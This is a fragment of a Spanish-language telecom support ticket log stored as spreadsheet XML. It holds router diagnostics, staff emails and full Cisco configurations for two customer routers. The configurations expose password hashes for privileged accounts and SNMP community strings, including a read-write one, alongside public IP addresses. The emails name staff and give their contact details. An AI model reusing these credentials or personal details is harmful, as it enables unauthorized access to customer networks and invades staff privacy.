  PING 10.72.193.156: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.193.156 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.193.156
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.193.128/26  DIRECT  0    0             D   10.72.193.129   VLANIF2249			
SERVICIO PRINCIPAL
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN BANRURAL 10.72.193.96
  PING 10.72.193.96: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.193.96 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.193.96
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.193.64/26  DIRECT  0    0             D   10.72.193.65    VLANIF184			</t>
  </si>
  <si>
    <t>F4563741</t>
  </si>
  <si>
    <t>SE LLAMA AL CONTACTO COLOCADO EN EL TICKET INDICA QUE RESPONDERA EL CORREO DE APERTURA CON LOS CONTACTOS EN SITIO  CON LA INFORMACION SOLICITADA POR NOSOTROS QUE SERIA UN CONTACTO PARA PODER REALIZAR LAS PRUEBAS DE 1ER NIVEL.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE NUEVAMENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 9:07
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; PIEDRA MORA, VICTOR MANUEL &lt;V.PIEDRAMORA@DXC.COM&gt;
CC: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FEMSA | INC23281749 | VOLCANES-CAMOJA-DISTRIBUIDORA | ENLACE CLARO DOWN
ESTIMADO SR. PIEDRA
COMO PARTE DEL SEGUIMIENTO AL CASO REPORTADO, SE OBSERVA QUE DESDE EL NODO NO SE TIENE LINK DE FIBRA HACIA EL EQUIPO ETX1 DEL CLIENTE, POR TAL RAZÓN SOLICITAMOS UN CONTACTO EN SITIO PARA DESCARTAR LAS PRUEBAS DE PRIMER NIVEL.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>ES NECESARIO REALIZAR PRUEBAS DE 1 ER NIVEL CON EL CLIENTE YA QUE NO SE ALCANZA EL EQUIPO DEL PUNTO REMOTO NI EL ROUTER NI EL EQUIPO DE DE ULTIMA MILLA</t>
  </si>
  <si>
    <t>***--- CL INDICA QUE NOS COMPARTIRA EL DATO DEL PERSONAL EN SITIO PARA PRUEBAS MAS TARDE -**
DE: PIEDRA MORA, VICTOR MANUEL [MAILTO:V.PIEDRAMORA@DXC.COM]
ENVIADO EL: DOMINGO, 15 DE MAYO DE 2022 04:03
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;
ASUNTO: RE: FEMSA | INC23281749 | VOLCANES-CAMOJA-DISTRIBUIDORA | ENLACE CLARO DOWN
BUENAS ESTIMADOS,
PARA ACTUALMENTE NO SE TIENE PERSONAL TÉCNICO EN EL SITIO POR LO QUE SERÍA EN HORARIO HÁBIL QUE SE PODRÍA BRINDAR EL CONTACTO.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE, AUTORIZANDO CIERRE DE TICKET
DE: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 10:00
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; PIEDRA MORA, VICTOR MANUEL &lt;V.PIEDRAMORA@DXC.COM&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FEMSA | INC23281749 | VOLCANES-CAMOJA-DISTRIBUIDORA | ENLACE CLARO DOWN
BUEN DÍA,
ADELANTE CON EL CIERRE.
SALUDOS,
LUIS ALEJANDRO LÓPEZ ZELEDÓN
NETWORK OPERATION CENTER, NETOPS
DXC TECHNOLOGY
T +1.866.818.2106 OPT 3 (4440-1942 FROM MX)
L.LOPEZZELEDON@DXC.COM
ULTRAPARK II, EDIFICIO 2, LAGUNILLA DE HEREDIA, COSTA RICA.
GMT -6 AMÉRICA CENTRAL
 DXC.COM | TWITTER* | FACEBOOK* | LINKEDIN* | CAMPAIGN PROMOTION*</t>
  </si>
  <si>
    <t>F4563743</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO  EN ESTE MOMENTO NO SE OBSERVAN ALARMAS EN EL CPE Y SE TIENEN ALARMAS DESDE EL 10 DE MAYO Y TIENE 1 SEMANA DE NO HABERSE APAGADO .
ROUTER CPE ACTIVO HACE 1 SEMANA.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BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS UPTIME IS 1 WEEK, 1 DAY, 5 HOURS, 32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217L0QW
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC2217L0QW
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3819 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 5 $1$1SSS$MBA1NR3X6PHLOJHFDRR3N/
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
LOGIN BLOCK-FOR 120 ATTEMPTS 3 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO_TELNET/SSH
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2217L0QW
!
!
USERNAME GESTIONIP SECRET 5 $1$FI3S$AVATTTOCL3NS55.QERX.Z/
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.127.224 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/379700015T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.87.163.133 255.255.255.248
 IP FLOW INGRESS
 IP FLOW EGRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.148.15.97 255.255.255.248
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-EXPORT SOURCE GIGABITETHERNET0/1
IP FLOW-EXPORT VERSION 5
IP FLOW-EXPORT DESTINATION 10.16.130.71 2055
IP FLOW-TOP-TALKERS
 TOP 20
 SORT-BY BYTES
 CACHE-TIMEOUT 800
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.163.129
IP ROUTE 10.16.130.71 255.255.255.255 GIGABITETHERNET0/1 NAME MONITOREONETFLOW
!
IP ACCESS-LIST EXTENDED ACCESO_TELNET/SSH
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY LOSVOLCANES RO
SNMP-SERVER COMMUNITY LOSVOLCANES! RW
SNMP-SERVER COMMUNITY MON003797I RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER IFINDEX PERSIST
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_BODEGAS EL ROSARIO ALDEA JUSTO RUFINO BARRIOS ZONA 8 QUETZALTENANGO, QUETZALTENANGO, LAT. 1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BANNER MOTD ^CCCD
AVISO: EL INGRESO A ESTE EQUIPO ACTIVO ESTA SIENDO AUDITADO LAS 24 HORAS Y ES
PERMITIDO UNICAMENTE A PERSONAL AUTORIZADO, SI EL LECTOR DE ESTE MENSAJE NO
ESTA AUTORIZADO, SE LE NOTIFICA QUE EL USO INDEBIDO DE ESTA CONFIGURACION
ESTA ESTRICTAMENTE PROHIBIDO. SI ES UN PROVEEDOR Y NECESITA EL ACCESO FAVOR
DE COMUNICARSE CON EL ADMINISTRADOR DE LA RED.
^C
!
LINE CON 0
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO_TELNET/SSH IN
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 21 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 21 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 24 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.399: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY  7 03:51:01.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY  7 03:51:06.047: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*MAY  7 03:51:12.075: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY  7 03:51:12.075: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY  7 03:51:13.075: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY  7 03:51:13.075: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY  7 03:51:17.199: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY  7 03:51:19.731 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY  7 03:51:20.715 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY  7 03:51:21.583 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY  7 03:51:21.583 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY  7 03:51:22.619 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY  7 03:51:22.619 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY  7 03:51:23.095 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
*MAY  7 03:51:23.095 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS IS UNDERGOING A COLD START
*MAY  7 03:51:26.083 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY  7 03:51:27.083 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 10 07:48:23.061 UTC: %PLATFORM-5-ECC_MSG: A CORRECTED SINGLE BIT ERROR HAS OCCURRED IN L2C DATA CACHE AT LOCATION 0X1C1.
*MAY 10 07:48:28.061 UTC: %PLATFORM-5-ECC_MSG: A CORRECTED SINGLE BIT ERROR HAS OCCURRED IN L2C DATA CACHE AT LOCATION 0X1C1.
*MAY 10 07:48:33.061 UTC: %PLATFORM-5-ECC_MSG: A CORRECTED SINGLE BIT ERROR HAS OCCURRED IN L2C DATA CACHE AT LOCATION 0X1C1.
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
SHOW CLOCK
*09:23:18.298 UTC SUN MAY 15 2022
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.163.129           1   A4BE.2BE5.602F  ARPA   GIGABITETHERNET0/0
INTERNET  10.87.163.133           -   7079.B310.9680  ARPA   GIGABITETHERNET0/0
INTERNET  190.148.15.97           -   7079.B310.9681  ARPA   GIGABITETHERNET0/1
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/379700015T/_/
GI0/1                          DOWN           DOWN     LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.87.163.133   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         190.148.15.97   YES NVRAM  DOWN                  DOWN
LOOPBACK5                  10.212.127.224  YES NVRAM  UP                    UP
CC_BEBIDAS_LOSVOLCANES_GT_INTERNET_RUFINO_BARRIOS#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.87.163.133
  PING 10.87.163.133: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.163.133 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.4
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.163.133
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.87.163.133/32  DIRECT  0    0                 0.0.0.0         VLANIF3750			</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  COLOCADO EN EL TTK SE  LE INDICA QUE EL SERIVICIO SE ENCUENTRA OPERATIVO.INDICA QUE ENVIARA INFRMACION SOBRE QUE VE CAIDO EL SERVICIO  EN EL CORREO DE APERTURA</t>
  </si>
  <si>
    <t>F4563762</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE DE TTK
ROUTER CPE ACTIVO HACE 4 SEMANAS.
CISCO IOS SOFTWARE, 1841 SOFTWARE (C1841-IPBASE-M), VERSION 12.4(15)T13, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED WED 07-APR-10 10:20 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 12.4(13R)T, RELEASE SOFTWARE (FC1)
ID1094024 UPTIME IS 4 WEEKS, 6 DAYS, 16 HOURS, 26 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C1841-IPBASE-MZ.124-15.T13.BIN"
CISCO 1841 (REVISION 7.0) WITH 233472K/28672K BYTES OF MEMORY.
PROCESSOR BOARD ID FTX14238073
2 FASTETHERNET INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
191K BYTES OF NVRAM.
62720K BYTES OF ATA COMPACTFLASH (READ/WRITE)
CONFIGURATION REGISTER IS 0X2102
ID1094024#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3416 BYTES
!
VERSION 12.4
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME ID1094024
!
BOOT-START-MARKER
BOOT-END-MARKER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AAA SESSION-ID COMMON
CLOCK TIMEZONE GMT -6
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
NO IP BOOTP SERVER
NO IP DOMAIN LOOKUP
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 SECRET 5 $1$KIWH$XB/Y5K/TDZ8CTV/WERVLN/
USERNAME MUHODF PRIVILEGE 15 SECRET 5 $1$7MNZ$NW07XGFDP87WWEMANLDI4.
ARCHIVE
 LOG CONFIG
  HIDEKEYS
!
!
IP TCP SYNWAIT-TIME 10
BRIDGE IRB
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO CNOC
 IP ADDRESS 10.166.8.50 255.255.255.255
!
INTERFACE FASTETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/ID1094024SV/_/
 BANDWIDTH 6144
 IP ADDRESS 10.152.4.53 255.255.255.252
 RATE-LIMIT INPUT 6144000 1152000 2304000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 6144000 1152000 2304000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.86.198.241 255.255.255.252
 IP VIRTUAL-REASSEMBLY
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
IP ROUTE 0.0.0.0 0.0.0.0 10.152.4.54
!
!
NO IP HTTP SERVER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SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
NO CDP RUN
!
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
LINE AUX 0
LINE VTY 0 4
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP CLOCK-PERIOD 17180399
NTP SERVER 201.247.152.249
NTP SERVER 201.247.152.233 PREFER
END
ID1094024#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (1 MESSAGES DROPPED, 1 MESSAGES RATE-LIMITED,
                0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 7 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    LOGGING EXCEPTION SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
ESM: 0 MESSAGES DROPPED
    TRAP LOGGING: LEVEL INFORMATIONAL, 11 MESSAGE LINES LOGGED
LOG BUFFER (4096 BYTES):
*APR 10 12:52:46.747 GMT: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 18:52:46 UTC SUN APR 10 2022 TO 12:52:46 GMT SUN APR 10 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*APR 10 12:52:47.195 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*APR 10 12:52:47.404 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0, CHANGED STATE TO UP
*APR 10 12:52:47.404 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/1, CHANGED STATE TO UP
*APR 10 12:52:47.676 GMT: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, 1841 SOFTWARE (C1841-IPBASE-M), VERSION 12.4(15)T13, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED WED 07-APR-10 10:20 BY PROD_REL_TEAM
*APR 10 12:52:47.680 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST ID1094024 IS UNDERGOING A COLD START
*APR 10 12:52:48.064 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
ID1094024#
SHOW CLOCK
*05:20:25.070 GMT SUN MAY 15 2022
ID1094024#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.152.4.53             -   1C17.D365.D99C  ARPA   FASTETHERNET0/0
INTERNET  10.152.4.54             6   084F.0AC8.696C  ARPA   FASTETHERNET0/0
INTERNET  190.86.198.241          -   1C17.D365.D99D  ARPA   FASTETHERNET0/1
INTERNET  190.86.198.242          0   0C8D.DBAF.F17E  ARPA   FASTETHERNET0/1
ID1094024#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0/0                          UP             UP       WAN PRINCIPAL/_/ID1094024SV/_/
FA0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO CNOC
ID1094024#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
FASTETHERNET0/0            10.152.4.53     YES NVRAM  UP                    UP
FASTETHERNET0/1            190.86.198.241  YES NVRAM  UP                    UP
LOOPBACK5                  10.166.8.50     YES NVRAM  UP                    UP
ID1094024#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_ID_ESV 10.152.4.53
  PING 10.152.4.53: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.4.53 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.30.90
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_ID_ESV 10.152.4.53
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_ID_ESV
SUMMARY COUNT : 1
